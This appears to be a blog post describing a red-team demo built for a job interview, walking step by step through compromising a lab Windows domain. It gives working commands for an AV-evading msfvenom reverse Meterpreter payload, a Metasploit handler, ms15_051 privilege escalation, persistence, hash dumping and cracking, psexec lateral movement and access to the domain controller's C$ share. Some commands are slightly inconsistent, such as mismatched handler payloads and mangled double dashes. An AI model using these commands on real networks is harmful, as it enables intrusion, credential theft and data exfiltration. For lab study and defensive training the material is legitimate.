Some weeks ago I was contacted via LinkedIn by a very interesting startup that was looking for a sales engineer for Italian market. After a couple of phone interviews, they asked me to prepare a demo. The idea of the demo was to recreate a corporate environment, simulate an attack to a client and perform a data exfiltration from domain controller.

Anyway, due the limited time (3/4 days) I used the first techniques that I found working. With more time I should have done a better job, developing a more complex and stealth attack or writing a custom exploit.

Attack scenario

These are the constraints for the exercise:

the 2 endpoints should be windows 10/7;

each end point will have personal firewall on with restriction for outbound communication http/https/dns;

each endpoint will include windows defender turn on with default settings;

all communication from the vm (organization) network to the internet will be filtered except http/s;

DC server in different segment (2012 and above);

DC will have personal firewall on with restriction for common AD services only;

DC cannot access to internet;

DC will include sensitive doc file;

I then start preparing a working environment. I used a notebook running KVM for virtualizing the target network and another latptop with a Kali VM for the attack machine. The two physical machine was connected by a ethernet cable.

Due to limited time, I decided to use a routing and firewalling platform that I know very well and that I can setup and configure in a very short time. Then I decided to use a KVM VM running a demo version of Mikrotik RouterOS (even if I made some interesting tests with Vyos).

Let’s move to the interesting part then.

My strategy to approach the PoC was organized in these different steps:

Initial foothold Lateral movement Domain Controller attack Data Exfiltration Housekeeping (optional)

Phase 1: Initial Foothold

In order to simulate an attack, I just want that it should be the more realistic as possible, then I collected some interesting statistics aboout cybersecurity threats and attack:

Then, I decided to attack the client with the following strategy using a two way dropper:

The first stage dropper is a Powershell script that will be embedded inside a fake invoice

I will distribute the dropper to the target via email, simulating spear phising attack (this parts was considered out of scope)

Once executed, the dropper will download an exe files containing the reverse shell (second stage)

Let’s analyze more in details the preparation of the first stage malware:

In the attacker workstation, we will launch a simple web server using a Python one-liner, listening on port 53 (in order to pass over a permitted port):

python -m SimpleHTTPServer 53

In the target workstation (executed through a social engineer attack, out of the scope of the demo) we will launch a powershell script that connect to the attacker workstation, download the backdoor and execute it

The second stage malware embeds a reverse Meterpreter HTTPS shell using windows/meterpreter/reverse_https

In order to bypass the antivirus (Microsoft Windows Defender updated to last version) the payload will be encoded using msfvenom, in order to evade with shikata_ga_nai encoder

msfvenom -a x86 — platform windows -p windows/meterpreter/reverse_https LHOST=$ATTACKER_IP LPORT=443 -e x86/shikata_ga_nai -i 3 -b “\x00” -f exe-only -o $MALWARE_PATH/backdoor.exe

The shell will be configured to connect to IP of attacker where an handler is listening. I will use HTTPS as transport protocol in order to bypass firewall rules and not be inspected (no SSL inspection in the assignment).

use exploit/multi/handler

set payload windows/meterpreter_reverse_tcp

set LHOST $ATTACKER_IP

set LPORT 443

run

When the exe is launched by the stage one, the connection to the attacker will start; after acquiring the shell, I will migrate to explorer.exe or other less suspicious processes in order to leave less evidence.

Right now we have a persistent backdoor as a reverse shell in the first client, but we don’t have any administrative rights for executing privileged tasks and activities, then we should escalate the privileges.

run post/multi/recon/local_exploit_suggester

For finding local exploit we can use a very handy module native in Metasploit post/multi/recon/local_exploit_suggester. In my case, this was very useful, because time constraint was very tight and I don’t have so much time to manually test different exploits. This module suggested to use the exploit: ms15_051_client_copy_image. This module exploits improper object handling in the win32k.sys kernel mode driver.

use exploit/windows/local/ms15_051_client_copy_image

set session 1

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST $ATTACKER_IP

set LPORT 443

exploit

Using it, we can have a local administrator shell that can be migrated with the migrate command in order to be less suspicious (this is made through DLL injection) and then become persistent.

migrate -N svchost.exe bg

use post/windows/manage/persistence_exe

Phase 2: Lateral movement

After obtaining a privileged shell, we can move around in the network to compromise another client. Suppose that we already know the address of the other client (in a real scenario, we need to find it via a time consuming information gathering process), we can try to use a pass-the-hash attack in order to access to another PC. This attack uses the NTLM hashes cached locally (i.e. after an administrator login on the client) for authenticate in other clients even if we don’t know the passwords.

These hashes are stored Security Account Manager (SAM) database and we can inspect it with the meterpreter command hashdump:

hashdump Administrator:500:CEEB0FA9F240C200417EAF40CFAC29C3:D280553F0103F2E643406517296E7582:::

This is the format of the output:

Username:RelativeIdentification(RID):LM Hash:NTLM Hash::

Let’s try to extract the stored domain hashes that have been cached as a result of a GPO setting or after an Administrator login, using the meterpreter command cachedump

If we get something, we can try to crack them with john, in order to get credentials

john — format=mscash2 hashs2.txt

After few minutes, this is the result:

john — show — format=mscash2 hashs2.txt

user.a:Passw0rd::

administrator:Passw0rd:: 2 password hashes cracked, 0 left

If this process works fine (like in my case) we have password and hashes to move around using psexec. The meterpreter module psexec try to upload and execute a reverse shell in a SMB share using the command psexec.

use exploit/windows/smb/psexec

set SMBPass Passw0rd

set SMBUser Administrator

show options

set SMBDomain ATTACK.LAN

set LHOST $WKS2_IP exploit

After got a shell, we can escalate privileges and upload the dropper in order to have a new reverse shell to the handler in the attack workstation.

Phase 3: Domain controller attack

Let’s try to attack DC. We can get the address of DC with the command:

nltest /dclist:ATTACK.LAN

DC has no access to internet and very restrictive firewall policies (only AD services), but let’s try if I can avoid connection pivoting through one of the clients, due to my limited time. Keep It Simple!

I already know the domain administrator password and hashes, then I may use psexec from client1 for executing commands on DC or mounting the DC’s C$ share on client1 and then access all datas.

net use s: \\DC\C$ /user:Administrator

It works! I now have a not interactive shell and access to the whole DC filesystem. This is enough for the scope of the demo.